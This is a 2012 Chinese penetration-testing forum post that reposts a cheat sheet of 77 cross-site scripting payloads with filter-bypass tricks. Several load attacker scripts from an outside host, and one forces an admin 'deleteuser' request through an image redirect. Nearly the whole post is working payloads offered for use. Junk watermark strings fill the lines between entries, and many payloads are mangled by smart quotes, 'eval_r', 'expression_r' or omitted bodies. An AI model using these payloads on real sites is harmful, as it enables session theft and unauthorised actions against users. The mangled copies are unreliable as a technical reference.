中国网络渗透测试联盟
标题:
xss跨站脚本攻击汇总
[打印本页]
作者:
admin
时间:
2012-9-5 14:56
标题:
xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 ?, \5 ?1 E' q7 T% I# u
, ]) m7 f2 r6 H, j2 Q
(1)普通的XSS JavaScript注入
2 n4 ^4 m% E! N: ?$ O& p1 B
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 {9 M. Q! ?& C& f/ w8 n7 J
7 s; i2 A+ ]1 B+ G9 c* b2 {2 U
(2)IMG标签XSS使用JavaScript命令
4 G2 f# F6 I. X0 U8 s9 [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" B( S: r7 R' p3 P
. l) D; t% L. C: L
(3)IMG标签无分号无引号
4 L; z3 C: Y. F2 Q) y# ]! n
<IMG SRC=javascript:alert(‘XSS’)>
: C* M: i2 \, W% N
! k5 H' f8 ]+ C
(4)IMG标签大小写不敏感
T% P! e+ K7 J- S2 l9 o J, [
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
, P; Q- d3 i' c
) b( L. a# ?' K) ^5 V- _) u
(5)HTML编码(必须有分号)
7 C" n9 `3 s$ v
<IMG SRC=javascript:alert(“XSS”)>
3 `% j1 \' v' Y8 U1 T$ v, {" s
: J, q1 g; E0 @0 g/ R9 F( i
(6)修正缺陷IMG标签
8 ~8 X6 k4 |& d) D% Q
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 {) [; y0 ~5 _/ F: I( j8 W N
% K7 O: [8 V, V
(7)formCharCode标签(计算器)
# e3 M; U+ l: n) t* w
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
' Z% S3 B2 F# v3 `- h- D$ _
8 ^7 N; G( t7 d0 l: o5 c
(8)UTF-8的Unicode编码(计算器)
, [; t5 ~6 T5 |9 _' e: b6 f* F
<IMG SRC=jav..省略..S')>
0 v- Y! `9 m$ e1 D* Q2 ]9 D
8 ?; x. D% o) H
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 P- {: P0 j( x0 `2 D& N
<IMG SRC=jav..省略..S')>
6 d: ^# A5 r1 r! r+ w! P( b
/ I- {1 X! Q3 l8 W$ A6 p+ P
(10)十六进制编码也是没有分号(计算器)
( a7 |0 W/ k( F$ l9 o
<IMG SRC=java..省略..XSS')>
7 N4 q0 r% h$ j. }( Z; X" _
& {- a) S8 G. u3 _7 C$ z' L% [
(11)嵌入式标签,将Javascript分开
4 C8 D# i. x! T
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 N( Z* Z; s1 x" `) f
5 f. G) d/ L! \. L! w
(12)嵌入式编码标签,将Javascript分开
; y1 d% {% X5 b4 r' D' D4 A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' X1 X: G) q3 W @9 V
' ?4 i5 [4 q- S4 ^ C0 _
(13)嵌入式换行符
! r8 j' h5 b) A$ N6 |( i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' {4 C+ X" F) W; e9 r8 g& Y
% R5 g+ [" k5 F( y
(14)嵌入式回车
0 z1 H* l/ h: f3 T# Y8 e( `8 r# n
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 w# b' E. O3 _4 [* R) g5 Z
( C# v+ i/ v2 S: P6 s6 {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 L% E+ K$ N: c3 F8 B
<IMG SRC=”javascript:alert(‘XSS‘)”>
& a% K. v1 F, r- i: n
; A, u/ ?0 Z5 B" C4 E
(16)解决限制字符(要求同页面)
. c" i( n0 t2 [& X, k: B0 X* \
<script>z=’document.’</script>
# ^/ [. I- o) [6 S
<script>z=z+’write(“‘</script>
9 F, H, ^ K/ R; v) @
<script>z=z+’<script’</script>
% }0 \/ O1 A2 x& ]6 [/ z
<script>z=z+’ src=ht’</script>
- l# e; m$ H% u6 e4 L
<script>z=z+’tp://ww’</script>
: x$ H/ d' V* k) C# k
<script>z=z+’w.shell’</script>
G1 z3 w+ @9 K# i& b
<script>z=z+’.net/1.’</script>
# p) d# m. `7 g3 R; c5 o
<script>z=z+’js></sc’</script>
4 p, d0 o3 Y3 C9 P. _( y
<script>z=z+’ript>”)’</script>
9 w) D" o3 t; {* |$ t( U# f) e
<script>eval_r(z)</script>
! Q. A0 e8 z) b) u$ y
) T0 ^7 X! n5 r- Z( @5 V$ n
(17)空字符
. Y. d' g1 J$ U' R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% w8 O2 Z4 c, f$ \8 j8 |
) S6 u- x+ ~8 c: C
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 A- n0 v2 M) c5 g& k6 ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
7 Z2 K4 y4 U4 L- i8 B
# T0 k; s+ `) B; b; r% ^
(19)Spaces和meta前的IMG标签
* ^+ P8 _$ o7 m' O
<IMG SRC=” javascript:alert(‘XSS’);”>
V! L9 s5 X: x
) ~2 l9 Y% G6 ]0 |2 j2 F0 W3 o
(20)Non-alpha-non-digit XSS
. g4 S! D3 B) b5 Z% }4 i
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
# S# x |) l3 ?4 F8 o. o. I
. ^0 c: W) _+ g
(21)Non-alpha-non-digit XSS to 2
' F# v! y2 ^( c6 ~" x
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( U% C" b7 S; V4 u7 ]8 p4 Q" v
3 c/ [" ^8 y3 V5 u6 L$ {
(22)Non-alpha-non-digit XSS to 3
9 u P$ i/ O6 x* P& c7 b) N
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
6 M: N G9 E; d' b) P5 X4 S
& u: q3 w$ T0 H1 }& I; r# |
(23)双开括号
/ b4 ]4 A: b' C3 q. F2 U) ?; r1 R
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" C( O# x- w5 Q/ p3 f2 r
c- F- J- }" ]. |. k2 G& {
(24)无结束脚本标记(仅火狐等浏览器)
J7 B% V/ i' Z" h; q
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, N4 }1 m, Y* z3 s
. O4 G) k7 L" A& b
(25)无结束脚本标记2
% W( I9 |4 j& `. q0 I
<SCRIPT SRC=//3w.org/XSS/xss.js>
' P& {# n. J4 i* D/ h+ p+ D
" ], v0 i* a9 t5 ~
(26)半开的HTML/JavaScript XSS
' e! r' n& y+ ^8 x$ S
<IMG SRC=”javascript:alert(‘XSS’)”
6 Z: }6 U+ P: N
9 u/ r' q+ l y; Q5 a2 u: K
(27)双开角括号
7 ]# H8 X4 a' |0 v. H! O
<iframe src=http://3w.org/XSS.html <
) y$ b+ R8 D. l; o
, }4 t4 P, C1 a+ y7 T0 N7 B6 k! ~
(28)无单引号 双引号 分号
/ E) D0 t6 \' q, U8 n2 T: p
<SCRIPT>a=/XSS/
% l( M1 C, h. z* ^. F
alert(a.source)</SCRIPT>
' d) X5 k6 P1 S! H% n# W# i
* P8 X. [" x% K1 R! r' ]( Q5 Z
(29)换码过滤的JavaScript
2 }: C" ~7 U, p
\”;alert(‘XSS’);//
6 |9 X# m) x/ D- ^
& Q9 U# J: W* c* {! ~
(30)结束Title标签
/ J6 J3 S9 @* }" L4 r. }2 `( Y& \& F
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
M8 m% ?% b* c% W1 K, @
l5 s+ J; R2 s; n# Q
(31)Input Image
( Q( d. w! a+ z0 [
<INPUT SRC=”javascript:alert(‘XSS’);”>
1 o) [( `0 C' s+ e0 b
9 e- E) a8 N3 S% h, r
(32)BODY Image
( l4 ?; o+ B) O* B" Y. V& z# j
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 r! A/ P9 _7 F
' i( J) L# U2 ]9 Q% W
(33)BODY标签
- C1 S6 s7 V% L' J/ Y: e
<BODY(‘XSS’)>
' j' K. p1 B' M. A$ S! s9 h, |
1 D6 ?: S: s" D6 u; D2 T5 y! R/ _
(34)IMG Dynsrc
6 P- p# q/ D% W" k) U2 I
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ o6 [2 T" ]2 U+ Z3 f; D
0 Y7 x+ H, |+ k! w: r* m
(35)IMG Lowsrc
/ B0 o; ]% R9 m. g2 u# k! o
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
, \0 j- [# K9 H* G# f+ m4 j
( q4 D; F; f2 J& U% h# }* V
(36)BGSOUND
1 \. A& ?1 H4 p3 \
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ r. ` y, w. X: e; E! }2 g
9 `+ R+ I; f: v
(37)STYLE sheet
+ x' q2 S, e: Q/ O; C" N3 X- A
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 F5 ~% \8 A; {" g& A9 T: Y
, }( P* }6 L3 ]* O
(38)远程样式表
n9 A7 T1 I( n; [9 @! Y
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
8 D) k/ ?/ G: Y" n' m
: J. m9 e) l( {, q2 j
(39)List-style-image(列表式)
4 x1 t4 U, t) w+ o7 p: t& H2 n8 x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 H) _# i9 x+ J6 M2 z( d- }
/ l# q1 i: @/ D- V2 ~* Q. R) [
(40)IMG VBscript
* i: v" V1 V& [ O: Q8 U
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
/ e. b- j2 m$ z4 G! X8 F
0 G2 s9 T+ s* ?+ p2 m2 z
(41)META链接url
/ h. m9 r: {% q" J+ q
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 e$ [6 y/ u# F. c3 g% |5 X
0 ^( j1 n+ ?3 D. f
(42)Iframe
, L4 \% f- Z; z" W
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! {; |/ r& g4 L4 f
2 ]" I {+ Z3 V- I$ B5 ]
(43)Frame
" L- g* Y2 U- J# y3 p! E
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
: E* `( D' J" c! Y$ F" Z
% a1 z3 Q* S R
(44)Table
5 b: Q/ {5 X. M) F8 h1 m" n- Q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( n1 T7 ^. Q. f- K A
5 j3 ]" ^% H9 M6 b& g
(45)TD
6 i8 U( u6 Y+ z) z; O0 ] {
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
" \( o( U* i2 O: ^. T1 a" V0 ~/ o4 a
2 a. r2 G, \( o6 G
(46)DIV background-image
: y: S5 g. L# w! j2 |
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 q3 l: p9 M& R3 C
/ u/ f5 P1 C* h! e1 }2 _, ?, b
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) I6 J% Z; ?" }+ j" F
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 m. g' i [ s4 z( A, L& R
/ F( r% @7 z- E( C; G* w
(48)DIV expression
* w% {0 D/ U! {6 N
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& y4 Q* e- l B
) R. j' S" b6 _; H6 ?6 k3 o
(49)STYLE属性分拆表达
: Z! O) c( G o9 a m
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
& i: d8 W" V- s2 A- V) A- R2 S/ a
% e9 i3 O5 M9 w t9 H1 D
(50)匿名STYLE(组成:开角号和一个字母开头)
* P* t# h8 [3 k& k
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 w0 c0 D3 P1 ^& K( j1 i3 p7 [
% v7 U2 }% ?3 _$ v; v! p" t
(51)STYLE background-image
" _# x8 {5 ]9 y$ J! q4 Q4 `* y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
5 K' r$ h! u5 m9 |# }
: |, R6 U) W5 y: V
(52)IMG STYLE方式
% W3 W* Q& C" o
exppression(alert(“XSS”))’>
3 `- N- s& ~+ J% J! V
1 n! T- [! ]" |/ l z# d
(53)STYLE background
. R* R a5 G8 F& ?) B! c4 ?
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, E& g. C0 x7 Z# Y' E; P) J
6 @+ W% }# n& r5 p5 v7 t9 x6 ~& h
(54)BASE
; f' H) d4 [% Y# `3 k
<BASE HREF=”javascript:alert(‘XSS’);//”>
! ~: v. c& n" W* `
% ~+ Q8 S& i# A; l1 g: ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
2 O* u0 R6 c7 ]* t
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
/ C- f& B+ m H- q
1 _5 T( W; b, x- e$ h6 c1 l3 r
(56)在flash中使用ActionScrpt可以混进你XSS的代码
9 _4 u9 o1 k) l c5 j+ i8 k8 ?8 `
a=”get”;
$ q! ^; q: |: H& i/ E+ I0 ^
b=”URL(\”";
8 ^" ` O% x' f* ^
c=”javascript:”;
; y4 e! ^6 f& n2 k# c
d=”alert(‘XSS’);\”)”;
, h( c7 T. y) G7 @( }6 h r, N
eval_r(a+b+c+d);
3 q& v9 b$ u9 L/ V
% j4 C+ |& d! _' N |; j% f( b3 g
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 u& E* ^9 t, e+ k8 s6 ^
<HTML xmlns:xss>
/ a' k3 {( V3 {
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
+ g" \8 H. S( R5 Z3 d
<xss:xss>XSS</xss:xss>
: W& y) [( D! y5 ^9 u5 W
</HTML>
* j4 X4 b% |6 h) z5 U5 [
5 P6 w& p" {; l0 b- J4 G
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 N' D8 n' e9 {; O) o
<SCRIPT SRC=””></SCRIPT>
7 e# }9 f: }: s# |" Q4 x
4 G0 y2 W1 M+ i' F3 a3 j
(59)IMG嵌入式命令,可执行任意命令
- o0 }6 M3 A3 ^" d
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
" W: e9 [' ~/ S1 o
0 Z/ S7 b) ~: b* h8 F. ]
(60)IMG嵌入式命令(a.jpg在同服务器)
' v- f! N* h1 [9 S' }. E
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
9 k/ s, |( E) B, i' Y- h3 d; m
8 k9 ^$ t% R: U: J1 Z( k4 p
(61)绕符号过滤
I# w* K6 t% J% V
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
& k0 V9 @0 s; _# k5 S
* J+ W/ Y, p1 n2 y$ F# c$ w
(62)
$ b" R: u& r- ]) L
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
* k' i" c/ C. j( h' f" }& A
% { |+ t; m$ H1 m* S t
(63)
* x, I" F/ M! d v. s
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
% S$ T( M0 S' I! A; s7 g
" G5 R. |+ ^1 ~0 A
(64)
- W- d6 v; U, v! f9 V
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
0 X- `# A& g' m1 h( Y
: \8 c& i0 z2 J* A# t# o
(65)
* G) A: a0 p5 M8 Q- S4 J7 n) O
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
% p$ T% Z) T3 B5 |
" g, Y/ {2 N6 ~" \6 y% ~
(66)
8 O T* o; M* ~2 L% d _+ f
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
8 n' L- W, ~" y6 ~ ^7 K
( Z: B1 R7 Z, l7 @
(67)
, \. l! X0 }6 N4 l1 n2 Q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
$ S% S( B5 ]& y8 U, p
1 x* R$ w0 t+ Q5 v* O0 O
(68)URL绕行
6 m4 a- D& ^, y1 C' ?- c
<A HREF=”
http://127.0.0.1/
”>XSS</A>
/ i+ p9 H, k' Q6 T
7 [+ p* W( I1 t! j
(69)URL编码
; ^6 y2 u+ t# l! O: ]1 [3 ?0 G9 o
<A HREF=”
http://3w.org
”>XSS</A>
9 F& D, `# p- G5 T) U) k) {
7 V' Y! [' U5 {$ |
(70)IP十进制
W, \1 |6 z4 V! N$ M/ ]; j
<A HREF=”http://3232235521″>XSS</A>
/ m4 d& t [' u- I7 J! r
* R) r+ O2 D, z1 o- L5 [( E
(71)IP十六进制
7 F$ j! \; ^+ J$ M# f& i7 k
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
3 m, k7 b9 I6 C
+ y7 \, }/ S% B# L' }5 O* u
(72)IP八进制
j/ c9 h" a, t
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
- Y$ _ Z! U3 C1 q5 j2 i
! k. A4 B' ~# I$ |, z7 ^* k. B$ T1 ?
(73)混合编码
) G* ~3 e7 G" a: t$ M. Q: B) N
<A HREF=”h
- |; f/ D5 i2 n( D$ g) ~
tt p://6 6.000146.0×7.147/”">XSS</A>
J8 n) C# p, T( r
+ V* G. N0 F: J# [
(74)节省[http:]
+ @0 T3 B: \1 I+ q$ ]+ N" B
<A HREF=”//www.google.com/”>XSS</A>
# k% d0 N4 X) }, @+ M y) S
% y5 m; [. h2 q# _2 l
(75)节省[www]
/ s8 [+ b) U* h+ ^
<A HREF=”
http://google.com/
”>XSS</A>
+ w+ l) l! K; Z8 t& Q3 e
7 k" V. A8 _+ [1 {( d. c4 f
(76)绝对点绝对DNS
1 G; K9 `3 E, `; \1 u0 N
<A HREF=”
http://www.google.com./
”>XSS</A>
- a) H, X+ |1 X: a6 a; q" X( G
1 j9 a7 B$ `: \4 A
(77)javascript链接
R8 x. z/ r- ~; A) L
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2